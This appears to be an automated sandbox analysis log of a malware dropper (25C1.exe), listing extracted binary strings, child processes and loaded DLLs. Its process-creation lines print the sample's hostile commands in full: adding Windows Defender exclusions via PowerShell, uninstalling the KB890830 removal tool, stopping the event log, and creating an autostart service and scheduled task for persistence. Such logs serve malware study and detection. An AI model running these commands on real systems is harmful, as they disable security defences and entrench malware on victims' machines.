                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Users\user\Desktop\25C1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 25C1.exeReversingLabs: Detection: 78%
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                        Source: unknownProcess created: C:\Users\user\Desktop\25C1.exe "C:\Users\user\Desktop\25C1.exe"
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UTIXDCVF"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "UTIXDCVF"
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofileJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UTIXDCVF"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "UTIXDCVF"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /FJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: msvcr100.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: colorui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: mscms.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coloradapterclient.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: compstui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: inetres.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
